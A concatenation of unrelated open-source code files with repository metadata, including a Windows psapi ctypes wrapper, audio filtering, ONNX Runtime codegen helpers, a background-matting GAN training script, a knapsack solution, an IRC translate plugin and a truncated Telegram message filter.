self.assertEqual(False, os.path.isfile(mock_key_return))
self.assertEqual(False, os.path.isfile(mock_magnum_return))
def test_delete_client_files_none(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
self.assertEqual(True, os.path.isdir(mock_dir))
self.assertEqual(False, os.path.isdir(cert_dir))
cert_manager.delete_client_files(mock_cluster)
self.assertEqual(True, os.path.isdir(mock_dir))
self.assertEqual(False, os.path.isdir(cert_dir))
|
7fce0ee3732434a3746ba1a43b5eff06b6e10b73
|
e0cc314aa73c0a965a2022f19900df3ccc8c9f43
|
/windows/winproxy/apis/psapi.py
|
5b7690c4a3b7e8703019f7e04397115c1f79f3c3
|
[
"BSD-3-Clause"
] |
permissive
|
hakril/PythonForWindows
|
21823e743ee4ae7ff99e376378357833f2e19d26
|
82d0c5cc5c9b4d569dca2c755f26b947e3ff74f5
|
refs/heads/master
| 2023-06-08T03:25:50.354768
| 2023-05-26T07:31:06
| 2023-05-26T07:31:06
| 49,235,784
| 568
| 111
|
BSD-3-Clause
| 2023-01-30T12:04:03
| 2016-01-07T22:54:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
psapi.py
|
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import fail_on_zero
class PsapiProxy(ApiProxy):
APIDLL = "psapi"
default_error_check = staticmethod(fail_on_zero)
@PsapiProxy()
def GetMappedFileNameW(hProcess, lpv, lpFilename, nSize=None):
if nSize is None:
nSize = ctypes.sizeof(lpFilename)
return GetMappedFileNameW.ctypes_function(hProcess, lpv, lpFilename, nSize)
@PsapiProxy()
def GetMappedFileNameA(hProcess, lpv, lpFilename, nSize=None):
if nSize is None:
nSize = ctypes.sizeof(lpFilename)
return GetMappedFileNameA.ctypes_function(hProcess, lpv, lpFilename, nSize)
@PsapiProxy()
def QueryWorkingSet(hProcess, pv, cb):
return QueryWorkingSet.ctypes_function(hProcess, pv, cb)
@PsapiProxy()
def QueryWorkingSetEx(hProcess, pv, cb):
return QueryWorkingSetEx.ctypes_function(hProcess, pv, cb)
@PsapiProxy()
def GetModuleBaseNameA(hProcess, hModule, lpBaseName, nSize=None):
if nSize is None:
nSize = len(lpBaseName)
return GetModuleBaseNameA.ctypes_function(hProcess, hModule, lpBaseName, nSize)
@PsapiProxy()
def GetModuleBaseNameW(hProcess, hModule, lpBaseName, nSize=None):
if nSize is None:
nSize = len(lpBaseName)
return GetModuleBaseNameW.ctypes_function(hProcess, hModule, lpBaseName, nSize)
@PsapiProxy()
def GetProcessImageFileNameA(hProcess, lpImageFileName, nSize=None):
if nSize is None:
nSize = len(lpImageFileName)
return GetProcessImageFileNameA.ctypes_function(hProcess, lpImageFileName, nSize)
@PsapiProxy()
def GetProcessImageFileNameW(hProcess, lpImageFileName, nSize=None):
if nSize is None:
nSize = len(lpImageFileName)
return GetProcessImageFileNameW.ctypes_function(hProcess, lpImageFileName, nSize)
@PsapiProxy()
def GetProcessMemoryInfo(Process, ppsmemCounters, cb):
return GetProcessMemoryInfo.ctypes_function(Process, ppsmemCounters, cb)
|
0cc6483b1baf603a5ad785552c9bbc60eda0ce64
|
9161d1421be019e0573bd123460fe69e7cce4cb9
|
/mosqito/sound_level_meter/noct_spectrum/_n_oct_time_filter.py
|
457739829c03914d1d2226a7538ce24b7937b76e
|
[
"Apache-2.0",
"GPL-1.0-or-later"
] |
permissive
|
Eomys/MoSQITo
|
dadbc9159bfef348b1b762a0c8bef8a7f3ed1ef0
|
b6bf207ef4ac422fa075b5117bb186281b52b7c1
|
refs/heads/master
| 2023-08-03T13:02:07.943373
| 2022-12-23T15:31:36
| 2022-12-23T15:31:36
| 249,368,386
| 107
| 40
|
Apache-2.0
| 2023-08-02T15:47:18
| 2020-03-23T07:56:37
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,953
|
py
|
_n_oct_time_filter.py
|
# -*- coding: utf-8 -*-
# Standard library imports
import numpy as np
from scipy.signal import decimate, butter, sosfilt
def _n_oct_time_filter(sig, fs, fc, alpha, N=3):
"""Design of a nth octave filter set
Designs a digital 1/3-octave filter with center frequency fc for
sampling frequency fs. The filter is designed according to the
Order-N specification of the ANSI S1.1-1986 standard. Default
value for N is 3.
References:
ANSI S1.1-1986 (ASA 65-1986): Specifications for
Octave-Band and Fractional-Octave-Band Analog and
Digital Filters.
Parameters
----------
sig : numpy.ndarray
Time signal [any unit]
fs : float
Sampling frequency [Hz]
fc : float
Filter exact center frequency [Hz]
alpha : float
Ratio of the upper and lower band-edge frequencies to the mid-band
frequency
n : int, optional
Filter order. Default to 3
Outputs
-------
level : float
Rms level of sig in the third octave band centered on fc
"""
# Check for Nyquist-Shannon criteria
if fc > 0.88 * (fs / 2):
raise ValueError(
"""ERROR: Design not possible. Filter center frequency shall
verify: fc <= 0.88 * (fs / 2)"""
)
# Check for high fc/fs causing filter design issue
# [ref needed] and downsample if needed
if fc < fs / 200:
q = 2
while fc < fs / q / 200:
q += 1
sig = decimate(sig, q, axis=0)
fs = fs / q
# Normalized cutoff frequencies
w1 = fc / (fs / 2) / alpha
w2 = fc / (fs / 2) * alpha
# define filter coefficient
sos = butter(int(N), (w1, w2), "bandpass", analog=False, output='sos')
# filter signal
sig_filt = sosfilt(sos, sig, axis=0)
# Compute overall rms level
level = np.sqrt(np.mean(sig_filt ** 2, axis=0))
return level
if __name__ == "__main__":
pass
|
4270ab4628d32954e5d53c5b4b563d04e748d741
|
0f2b08b31fab269c77d4b14240b8746a3ba17d5e
|
/orttraining/orttraining/python/training/ort_triton/_common.py
|
65540202420b5ee820c6ac0da95a01aa1340749c
|
[
"MIT"
] |
permissive
|
microsoft/onnxruntime
|
f75aa499496f4d0a07ab68ffa589d06f83b7db1d
|
5e747071be882efd6b54d7a7421042e68dcd6aff
|
refs/heads/main
| 2023-09-04T03:14:50.888927
| 2023-09-02T07:16:28
| 2023-09-02T07:16:28
| 156,939,672
| 9,912
| 2,451
|
MIT
| 2023-09-14T21:22:46
| 2018-11-10T02:22:53
|
C++
|
UTF-8
|
Python
| false
| false
| 7,030
|
py
|
_common.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
from abc import abstractmethod
from typing import Any, Dict, List, Tuple
import sympy
from onnx import GraphProto, NodeProto, TensorProto
from ._sympy_utils import parse_shape
from ._utils import get_attribute, get_reduce_info, next_power_of_2
class CodegenContext:
"""
record variable name mapping in term of IRnodes.
"""
def __init__(self, var_map: Dict[str, str]):
self._var_map: Dict[str, str] = {**var_map}
# Get variable name by the node arg name in ONNX graph.
def get_variable_name(self, name: str) -> str:
return self._var_map[name]
# For some operators such as data load/store, we need an internal variable name inside the kernel function.
def get_internal_variable_name(self, name: str) -> str:
var_name = self._var_map[name]
return self._var_map[var_name] if var_name in self._var_map else var_name
class CodeBuffer:
def __init__(self):
self.buffer: List[str] = []
def __iadd__(self, other: str):
self.buffer.append(other)
return self
def __str__(self):
return "".join(self.buffer)
class NodeVisitor:
@abstractmethod
def codegen(self, node: Any, context: CodegenContext, code_buffer: CodeBuffer, indent: int):
pass
class TensorInfo:
"""
Represent a input/output tensor of a node.
"""
def __init__(self, dtype: TensorProto.DataType, shape: List[Any]):
self._dtype: TensorProto.DataType = dtype
self._shape: List[sympy.Expr] = parse_shape(shape)
@property
def dtype(self) -> TensorProto.DataType:
return self._dtype
@property
def shape(self) -> List[sympy.Expr]:
return self._shape
def _infer_elementwise_shape(input_infos: List[TensorInfo]) -> List[sympy.Expr]:
max_len = max([len(input_info.shape) for input_info in input_infos])
output_shape: List[sympy.Expr] = [sympy.Integer(1)] * max_len
for input_info in input_infos:
offset = max_len - len(input_info.shape)
for i in range(len(input_info.shape)):
if not input_info.shape[i].is_number or input_info.shape[i] != 1:
output_shape[i + offset] = input_info.shape[i]
return output_shape
def _infer_elementwise(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [TensorInfo(input_infos[0].dtype, _infer_elementwise_shape(input_infos))]
def _infer_where(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [TensorInfo(input_infos[1].dtype, _infer_elementwise_shape(input_infos))]
def _infer_reduction(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
input_rank = len(input_infos[0].shape)
keep_dims, axes = get_reduce_info(node, graph, input_rank)
axes = [axis + input_rank if axis < 0 else axis for axis in axes]
axes.sort()
shape = [input_infos[0].shape[i] for i in range(input_rank) if i not in axes]
if keep_dims:
for axis in axes:
shape.insert(axis, sympy.Integer(1))
return [TensorInfo(input_infos[0].dtype, shape)]
def _infer_unary(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [input_infos[0]]
def _infer_cast(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
dtype = get_attribute(node, "to", TensorProto.UNDEFINED)
assert dtype != TensorProto.UNDEFINED
return [TensorInfo(dtype, input_infos[0].shape)]
def _infer_dropout(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [input_infos[0], TensorInfo(TensorProto.BOOL, input_infos[0].shape)]
class TypeAndShapeInfer:
_INFER_FUNC_MAP = { # noqa: RUF012
"Add": _infer_elementwise,
"Sub": _infer_elementwise,
"Mul": _infer_elementwise,
"Div": _infer_elementwise,
"Pow": _infer_elementwise,
"Sqrt": _infer_elementwise,
"Exp": _infer_elementwise,
"Where": _infer_where,
"Rsqrt": _infer_elementwise,
"Cast": _infer_cast,
"Dropout": _infer_dropout,
"DropoutGrad": _infer_unary,
"Identity": _infer_unary,
"ReduceSum": _infer_reduction,
"ReduceMax": _infer_reduction,
"ReduceMin": _infer_reduction,
"Sum": _infer_elementwise,
}
@classmethod
def infer(cls, node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
if node.op_type not in cls._INFER_FUNC_MAP:
raise NotImplementedError(f"Unsupported op type: {node.op_type}")
return cls._INFER_FUNC_MAP[node.op_type](node, input_infos, graph)
class AutotuneConfigs:
"""
Generate all autotune configs for a kernel function by it's xnumel and rnumel.
A config is a tuple of (xblock, rblock, num_warps).
If it's elementwise kernel, the rnumel is 1.
If it's reduction kernel on last contiguous dimensions, the contiguous flag is True.
"""
def __init__(self, x_numel: int, r_numel: int, contiguous: bool):
self.configs: List[Tuple[int, int, int]] = self._gen_autotune_configs(x_numel, r_numel, contiguous)
self.requires_for_loop: bool = any(config[1] < r_numel for config in self.configs)
def _num_warps(self, x: int, r: int) -> int:
return min(max(x * r // 256, 2), 8)
def _gen_config(self, xnp2: int, rnp2: int, x: int, r: int) -> Tuple[int, int, int]:
x = min(x, xnp2)
r = min(r, rnp2)
return x, r, self._num_warps(x, r)
# TODO: we need to tune more kernels to get more reasonable configs for better performance.
def _gen_autotune_configs(self, x_numel: int, r_numel: int, contiguous: bool) -> List[Tuple[int, int, int]]:
configs = []
xnp2 = next_power_of_2(x_numel)
if r_numel == 1:
configs.append(self._gen_config(xnp2, 1, 1024, 1))
if xnp2 > 1024:
configs.append(self._gen_config(xnp2, 1, 2048, 1))
return configs
rnp2 = next_power_of_2(r_numel)
if contiguous:
configs.append(self._gen_config(xnp2, rnp2, 1, 2048))
if rnp2 > 2048:
configs.append(self._gen_config(xnp2, rnp2, 1, 4096))
elif rnp2 <= 256:
x = min(xnp2, 256 // rnp2 * 2)
configs.append(self._gen_config(xnp2, rnp2, x, rnp2))
else:
config_set = {
self._gen_config(xnp2, rnp2, 1, 2048),
self._gen_config(xnp2, rnp2, 4, 512),
self._gen_config(xnp2, rnp2, 8, 512),
self._gen_config(xnp2, rnp2, 32, 128),
}
configs = list(config_set)
return configs
|
c65d63167a55324a1987c6758bb5833edc2a898f
|
c168fe819b446640957e5e310ef89fcfe28662b3
|
/torchbenchmark/models/Background_Matting/train_real_fixed.py
|
c8636ece697bd64748207875f46e8c1aa0dcf945
|
[
"CC-BY-NC-SA-4.0",
"BSD-3-Clause"
] |
permissive
|
pytorch/benchmark
|
7b55e8d714de2ea873e03df43811aab3848485dd
|
df4da9bdff11a2f948d5bd4ac83da7922e6f44f4
|
refs/heads/main
| 2023-08-29T13:06:09.671728
| 2023-08-28T16:51:55
| 2023-08-28T16:51:55
| 92,541,759
| 685
| 220
|
BSD-3-Clause
| 2023-09-14T18:10:18
| 2017-05-26T19:21:12
|
Python
|
UTF-8
|
Python
| false
| false
| 8,803
|
py
|
train_real_fixed.py
|
from __future__ import print_function
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
from tensorboardX import SummaryWriter
import os
import time
import argparse
import numpy as np
from data_loader import VideoData
from functions import *
from networks import ResnetConditionHR, MultiscaleDiscriminator, conv_init
from loss_functions import alpha_loss, compose_loss, alpha_gradient_loss, GANloss
#CUDA
#os.environ["CUDA_VISIBLE_DEVICES"]="4"
print('CUDA Device: ' + os.environ["CUDA_VISIBLE_DEVICES"])
"""Parses arguments."""
parser = argparse.ArgumentParser(description='Training Background Matting on Adobe Dataset.')
parser.add_argument('-n', '--name', type=str, help='Name of tensorboard and model saving folders.')
parser.add_argument('-bs', '--batch_size', type=int, help='Batch Size.')
parser.add_argument('-res', '--reso', type=int, help='Input image resolution')
parser.add_argument('-init_model', '--init_model', type=str, help='Initial model file')
parser.add_argument('-epoch', '--epoch', type=int, default=10,help='Maximum Epoch')
parser.add_argument('-n_blocks1', '--n_blocks1', type=int, default=7,help='Number of residual blocks after Context Switching.')
parser.add_argument('-n_blocks2', '--n_blocks2', type=int, default=3,help='Number of residual blocks for Fg and alpha each.')
parser.add_argument('-d', '--debug', type=str, default="", help='File to dump output')
parser.add_argument('-s', '--script', type=bool, default=False, help='Trace the model')
args=parser.parse_args()
##Directories
tb_dir='TB_Summary/' + args.name
model_dir='Models/' + args.name
torch.manual_seed(1337)
np.random.seed(1337)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
if not os.path.exists(model_dir):
os.makedirs(model_dir)
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
## Input list
data_config_train = {'reso': (args.reso,args.reso)} #if trimap is true, rcnn is used
# DATA LOADING
print('\n[Phase 1] : Data Preparation')
def collate_filter_none(batch):
batch = list(filter(lambda x: x is not None, batch))
return torch.utils.data.dataloader.default_collate(batch)
#Original Data
traindata = VideoData(csv_file='Video_data_train.csv',data_config=data_config_train,transform=None) #Write a dataloader function that can read the database provided by .csv file
train_loader = torch.utils.data.DataLoader(traindata, batch_size=args.batch_size, shuffle=True, num_workers=args.batch_size, collate_fn=collate_filter_none)
print('\n[Phase 2] : Initialization')
netB=ResnetConditionHR(input_nc=(3,3,1,4),output_nc=4,n_blocks1=args.n_blocks1,n_blocks2=args.n_blocks2)
#netB=nn.DataParallel(netB)
#netB.load_state_dict(torch.load(args.init_model))
netB.cuda(); netB.eval()
for param in netB.parameters(): #freeze netD
param.requires_grad = False
netG=ResnetConditionHR(input_nc=(3,3,1,4),output_nc=4,n_blocks1=args.n_blocks1,n_blocks2=args.n_blocks2)
netG.apply(conv_init)
#netG=nn.DataParallel(netG)
netG.cuda()
torch.backends.cudnn.benchmark=True
netD=MultiscaleDiscriminator(input_nc=3,num_D=1,norm_layer=nn.InstanceNorm2d,ndf=64)
netD.apply(conv_init)
netD=nn.DataParallel(netD)
netD.cuda()
#Loss
l1_loss=alpha_loss()
c_loss=compose_loss()
g_loss=alpha_gradient_loss()
GAN_loss=GANloss()
optimizerG = optim.Adam(netG.parameters(), lr=1e-4)
optimizerD = optim.Adam(netD.parameters(), lr=1e-5)
log_writer=SummaryWriter(tb_dir)
step=50
KK=len(train_loader)
wt=1
print('Tracing')
for data in train_loader:
bg, image, seg, multi_fr = data['bg'], data['image'], data['seg'], data['multi_fr']
bg, image, seg, multi_fr = Variable(bg.cuda()), Variable(image.cuda()), Variable(seg.cuda()), Variable(multi_fr.cuda())
if args.script:
netB = torch.jit.trace(netB,(image,bg,seg,multi_fr))
netG = torch.jit.trace(netG,(image,bg,seg,multi_fr))
else:
netB(image,bg,seg,multi_fr)
netG(image,bg,seg,multi_fr)
break
print('Starting training')
for epoch in range(0,args.epoch):
netG.train(); netD.train()
lG, lD, GenL, DisL_r, DisL_f, alL, fgL, compL, elapse_run, elapse=0,0,0,0,0,0,0,0,0,0
t0=time.time();
for i,data in enumerate(train_loader):
#Initiating
bg, image, seg, multi_fr, seg_gt, back_rnd = data['bg'], data['image'], data['seg'], data['multi_fr'], data['seg-gt'], data['back-rnd']
bg, image, seg, multi_fr, seg_gt, back_rnd = Variable(bg.cuda()), Variable(image.cuda()), Variable(seg.cuda()), Variable(multi_fr.cuda()), Variable(seg_gt.cuda()), Variable(back_rnd.cuda())
mask0=Variable(torch.ones(seg.shape).cuda())
tr0=time.time()
#pseudo-supervision
alpha_pred_sup,fg_pred_sup=netB(image,bg,seg,multi_fr)
mask=(alpha_pred_sup>-0.98).type(torch.cuda.FloatTensor)
mask1=(seg_gt>0.95).type(torch.cuda.FloatTensor)
## Train Generator
alpha_pred,fg_pred=netG(image,bg,seg,multi_fr)
if args.debug:
torch.save(fg_pred, args.debug)
##pseudo-supervised losses
al_loss=l1_loss(alpha_pred_sup,alpha_pred,mask0)+0.5*g_loss(alpha_pred_sup,alpha_pred,mask0)
fg_loss=l1_loss(fg_pred_sup,fg_pred,mask)
#compose into same background
comp_loss= c_loss(image,alpha_pred,fg_pred,bg,mask1)
#randomly permute the background
perm=torch.LongTensor(np.random.permutation(bg.shape[0]))
bg_sh=bg[perm,:,:,:]
al_mask=(alpha_pred>0.95).type(torch.cuda.FloatTensor)
#Choose the target background for composition
#back_rnd: contains separate set of background videos captured
#bg_sh: contains randomly permuted captured background from the same minibatch
if np.random.random_sample() > 0.5:
bg_sh=back_rnd
image_sh=compose_image_withshift(alpha_pred,image*al_mask + fg_pred*(1-al_mask),bg_sh,seg)
fake_response=netD(image_sh)
loss_ganG=GAN_loss(fake_response,label_type=True)
lossG= loss_ganG + wt*(0.05*comp_loss+0.05*al_loss+0.05*fg_loss)
optimizerG.zero_grad()
lossG.backward()
optimizerG.step()
##Train Discriminator
fake_response=netD(image_sh); real_response=netD(image)
loss_ganD_fake=GAN_loss(fake_response,label_type=False)
loss_ganD_real=GAN_loss(real_response,label_type=True)
lossD=(loss_ganD_real+loss_ganD_fake)*0.5
# Update discriminator for every 5 generator update
if i%5 ==0:
optimizerD.zero_grad()
lossD.backward()
optimizerD.step()
lG += lossG.data
lD += lossD.data
GenL += loss_ganG.data
DisL_r += loss_ganD_real.data
DisL_f += loss_ganD_fake.data
alL += al_loss.data
fgL += fg_loss.data
compL += comp_loss.data
log_writer.add_scalar('Generator Loss', lossG.data, epoch*KK + i + 1)
log_writer.add_scalar('Discriminator Loss', lossD.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Fake', loss_ganG.data, epoch*KK + i + 1)
log_writer.add_scalar('Discriminator Loss: Real', loss_ganD_real.data, epoch*KK + i + 1)
log_writer.add_scalar('Discriminator Loss: Fake', loss_ganD_fake.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Alpha', al_loss.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Fg', fg_loss.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Comp', comp_loss.data, epoch*KK + i + 1)
t1=time.time()
elapse +=t1 -t0
elapse_run += t1-tr0
t0=t1
if i % step == (step-1):
print('[%d, %5d] Gen-loss: %.4f Disc-loss: %.4f Alpha-loss: %.4f Fg-loss: %.4f Comp-loss: %.4f Time-all: %.4f Time-fwbw: %.4f' %(epoch + 1, i + 1, lG/step,lD/step,alL/step,fgL/step,compL/step,elapse/step,elapse_run/step))
lG, lD, GenL, DisL_r, DisL_f, alL, fgL, compL, elapse_run, elapse=0,0,0,0,0,0,0,0,0,0
write_tb_log(image,'image',log_writer,i)
write_tb_log(seg,'seg',log_writer,i)
write_tb_log(alpha_pred_sup,'alpha-sup',log_writer,i)
write_tb_log(alpha_pred,'alpha_pred',log_writer,i)
write_tb_log(fg_pred_sup*mask,'fg-pred-sup',log_writer,i)
write_tb_log(fg_pred*mask,'fg_pred',log_writer,i)
#composition
alpha_pred=(alpha_pred+1)/2
comp=fg_pred*alpha_pred + (1-alpha_pred)*bg
write_tb_log(comp,'composite-same',log_writer,i)
write_tb_log(image_sh,'composite-diff',log_writer,i)
del comp
del mask, back_rnd, mask0, seg_gt, mask1, bg, alpha_pred, alpha_pred_sup, image, fg_pred_sup, fg_pred, seg, multi_fr,image_sh, bg_sh, fake_response, real_response, al_loss, fg_loss, comp_loss, lossG, lossD, loss_ganD_real, loss_ganD_fake, loss_ganG
if (epoch%2 == 0):
torch.save(netG.state_dict(), model_dir + 'netG_epoch_%d.pth' %(epoch))
torch.save(optimizerG.state_dict(), model_dir + 'optimG_epoch_%d.pth' %(epoch))
torch.save(netD.state_dict(), model_dir + 'netD_epoch_%d.pth' %(epoch))
torch.save(optimizerD.state_dict(), model_dir + 'optimD_epoch_%d.pth' %(epoch))
#Change weight every 2 epoch to put more stress on discriminator weight and less on pseudo-supervision
wt=wt/2
|
fb3355c6b1b2db63c814c9602cdd7587f09300b8
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/20_杂题/牛客编程巅峰赛/7_ 牛妹的春游-二维的01背包.py
|
123f68d93fa59b40c8d237e19fce46905c1d3026
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,043
|
py
|
7_ 牛妹的春游-二维的01背包.py
|
# 给出两个正整数x,y,另给出若干个数对[ai,bi,ci],
# 请挑选若干数对使得挑出的数对ai的和不小于x,bi的和不小于y,
# 计算挑出数对的ci的和的最小值
# breadNum,beverageNum<=2000 暗示状态就是这两维
# 可以用一个二维数组来表示状态,
# 其中第一维表示面包的数量,第二维表示饮料的数量
INF = 0x3F3F3F3F
class Solution:
def minCost(self, breadNum, beverageNum, packageSum):
n = len(packageSum)
dp = [[INF] * (beverageNum + 1) for _ in range(breadNum + 1)]
dp[0][0] = 0
for k in range(n):
num1, num2, cost = packageSum[k]
for i in range(breadNum, -1, -1):
for j in range(beverageNum, -1, -1):
dp[i][j] = min(dp[i][j], dp[max(0, i - num1)][max(0, j - num2)] + cost)
return dp[-1][-1]
print(
Solution().minCost(
5, 60, [[3, 36, 120], [10, 25, 129], [5, 50, 250], [1, 45, 130], [4, 20, 119]]
)
)
|
9022f3b5716f268f2b3b268f4ae65c2c33d720c4
|
c4f29914827284c581aabeee126e0c42dc7e1a56
|
/plugins/translate.py
|
e5774dcd8e5e476b91ca202b9541cb8f6c5b9d8f
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
rmmh/skybot
|
66a7698d960026da52ee2413845d1ca364a1713f
|
3bfaad863a833a25b145b094a803f742d3aec1b8
|
refs/heads/master
| 2023-08-29T21:29:14.094136
| 2023-08-15T02:38:23
| 2023-08-15T02:38:23
| 855,503
| 155
| 131
|
Unlicense
| 2023-03-29T00:21:52
| 2010-08-22T22:38:50
|
Python
|
UTF-8
|
Python
| false
| false
| 5,554
|
py
|
translate.py
|
"""
A Google API key is required and retrieved from the bot config file.
Since December 1, 2011, the Google Translate API is a paid service only.
"""
from builtins import zip
from builtins import chr
import html.entities
import re
from util import hook, http
########### from http://effbot.org/zone/re-sub.htm#unescape-html #############
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return chr(int(text[3:-1], 16))
else:
return chr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = chr(html.entities.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
return re.sub("&#?\w+;", fixup, text)
##############################################################################
def goog_trans(api_key, text, slang, tlang):
url = "https://www.googleapis.com/language/translate/v2"
parsed = http.get_json(url, key=api_key, q=text, source=slang, target=tlang)
if not 200 <= parsed["responseStatus"] < 300:
raise IOError(
"error with the translation server: %d: %s"
% (parsed["responseStatus"], parsed["responseDetails"])
)
if not slang:
return unescape(
"(%(detectedSourceLanguage)s) %(translatedText)s"
% (parsed["responseData"]["data"]["translations"][0])
)
return unescape(
"%(translatedText)s" % parsed["responseData"]["data"]["translations"][0]
)
def match_language(fragment):
fragment = fragment.lower()
for short, _ in lang_pairs:
if fragment in short.lower().split():
return short.split()[0]
for short, full in lang_pairs:
if fragment in full.lower():
return short.split()[0]
return None
@hook.api_key("google")
@hook.command
def translate(inp, api_key=""):
".translate [source language [target language]] <sentence> -- translates" " <sentence> from source language (default autodetect) to target" " language (default English) using Google Translate"
args = inp.split(" ", 2)
try:
if len(args) >= 2:
sl = match_language(args[0])
if not sl:
return goog_trans(api_key, inp, "", "en")
if len(args) == 2:
return goog_trans(api_key, args[1], sl, "en")
if len(args) >= 3:
tl = match_language(args[1])
if not tl:
if sl == "en":
return "unable to determine desired target language"
return goog_trans(api_key, args[1] + " " + args[2], sl, "en")
return goog_trans(api_key, args[2], sl, tl)
return goog_trans(api_key, inp, "", "en")
except IOError as e:
return e
languages = "ja fr de ko ru zh".split()
language_pairs = zip(languages[:-1], languages[1:])
def babel_gen(inp):
for language in languages:
inp = inp.encode("utf8")
trans = goog_trans(api_key, inp, "en", language).encode("utf8")
inp = goog_trans(api_key, trans, language, "en")
yield language, trans, inp
@hook.api_key("google")
@hook.command
def babel(inp, api_key=""):
".babel <sentence> -- translates <sentence> through multiple languages"
try:
return list(babel_gen(api_key, inp))[-1][2]
except IOError as e:
return e
@hook.api_key("google")
@hook.command
def babelext(inp, api_key=""):
".babelext <sentence> -- like .babel, but with more detailed output"
try:
babels = list(babel_gen(api_key, inp))
except IOError as e:
return e
out = ""
for lang, trans, text in babels:
out += '%s:"%s", ' % (lang, text.decode("utf8"))
out += 'en:"' + babels[-1][2].decode("utf8") + '"'
if len(out) > 300:
out = out[:150] + " ... " + out[-150:]
return out
lang_pairs = [
("no", "Norwegian"),
("it", "Italian"),
("ht", "Haitian Creole"),
("af", "Afrikaans"),
("sq", "Albanian"),
("ar", "Arabic"),
("hy", "Armenian"),
("az", "Azerbaijani"),
("eu", "Basque"),
("be", "Belarusian"),
("bg", "Bulgarian"),
("ca", "Catalan"),
("zh-CN zh", "Chinese"),
("hr", "Croatian"),
("cs", "Czech"),
("da", "Danish"),
("nl", "Dutch"),
("en", "English"),
("et", "Estonian"),
("tl", "Filipino"),
("fi", "Finnish"),
("fr", "French"),
("gl", "Galician"),
("ka", "Georgian"),
("de", "German"),
("el", "Greek"),
("ht", "Haitian Creole"),
("iw", "Hebrew"),
("hi", "Hindi"),
("hu", "Hungarian"),
("is", "Icelandic"),
("id", "Indonesian"),
("ga", "Irish"),
("it", "Italian"),
("ja jp jpn", "Japanese"),
("ko", "Korean"),
("lv", "Latvian"),
("lt", "Lithuanian"),
("mk", "Macedonian"),
("ms", "Malay"),
("mt", "Maltese"),
("no", "Norwegian"),
("fa", "Persian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("sr", "Serbian"),
("sk", "Slovak"),
("sl", "Slovenian"),
("es", "Spanish"),
("sw", "Swahili"),
("sv", "Swedish"),
("th", "Thai"),
("tr", "Turkish"),
("uk", "Ukrainian"),
("ur", "Urdu"),
("vi", "Vietnamese"),
("cy", "Welsh"),
("yi", "Yiddish"),
]
|
28e970f9afb6961a110c42689baf89794ba5320d
|
489f789e19ddf0f10cd739b3f091b5c61a63a857
|
/agent/utils/filter.py
|
dae42276c92bf44e78c833f5f1b08e5c417f2639
|
[] |
no_license
|
adityathebe/telegramForwarder
|
7523db3107911d5845f9e2ea887b4f7bd4e32953
|
d72e2264704f15ee5a78a14e11d50dc6be06519a
|
refs/heads/master
| 2021-06-15T08:10:10.101750
| 2021-05-03T17:23:17
| 2021-05-03T17:23:17
| 156,350,910
| 161
| 133
| null | 2021-02-15T13:38:31
| 2018-11-06T08:27:57
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,278
|
py
|
filter.py
|
import logging
from db.database import Database
logger = logging.getLogger('Filter')
database = Database()
class MessageFilter:
@staticmethod
def get_filter(filter_id):
filter = database.get_filter(filter_id)
if filter is None:
return False
filter_dict = {
'id': filter[0],
'audio': filter[1],
'video': filter[2],
'photo': filter[3],
'sticker': filter[4],
'document': filter[5],
'hashtag': filter[6],
'link': filter[7],
'contain': filter[8],
'notcontain': filter[9]
}
return filter_dict
@staticmethod
def get_active_filters(filter_dict):
"""
Takes in a filter dictionary
Returns a list of active filter names
Example: ('photo', 'audio')
"""
if not isinstance(filter_dict, dict):
raise ValueError('Provide a dictionary')
active_filter_list = []
for key, value in filter_dict.items():
if value != 0 and value is not None:
if key != 'id':
active_filter_list.append(key)
return active_filter_list
@staticmethod
def get_message_type(event):
# Photos Messages
if hasattr(event.media, 'photo'):
return 'photo'
# Look for links and hashtags in event.entities
if event.entities is not None:
for entity in event.entities:
entity_name = type(entity).__name__
if entity_name == 'MessageEntityHashtag':
return 'hashtag'
if entity_name == 'MessageEntityUrl':
return 'link'
# Text Messages
if event.media == None:
return 'text'
# Documents (audio, video, sticker, files)
